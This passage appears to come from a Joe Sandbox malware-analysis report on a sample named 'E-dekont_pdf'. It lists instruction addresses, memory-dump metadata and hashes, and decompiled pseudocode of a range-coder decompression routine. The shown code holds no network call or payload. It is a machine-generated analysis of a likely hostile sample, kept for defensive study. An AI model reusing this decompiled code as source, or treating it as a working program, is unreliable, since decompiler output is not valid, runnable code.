                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004073ce
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407120

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                              • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                              • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                              • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_push("true");
								_pop(_t568);
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__ebx = __edx + 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
